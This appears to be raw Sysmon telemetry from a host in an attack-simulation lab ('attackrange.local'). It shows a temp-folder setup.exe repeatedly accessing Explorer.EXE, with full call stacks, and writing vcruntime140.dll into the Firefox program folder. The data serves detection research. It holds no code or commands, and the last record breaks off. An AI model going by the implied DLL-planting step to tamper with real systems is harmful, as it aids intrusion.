13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015521Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015520Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015519Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015518Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015517Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015516Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015515Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015514Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000015513Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\vcruntime140.dll2021-01-18 13:59:52.583 10341000x800000000000000015512Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015511Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015510Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015509Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015508Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015507Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015506Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015505Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015504Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.583{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(w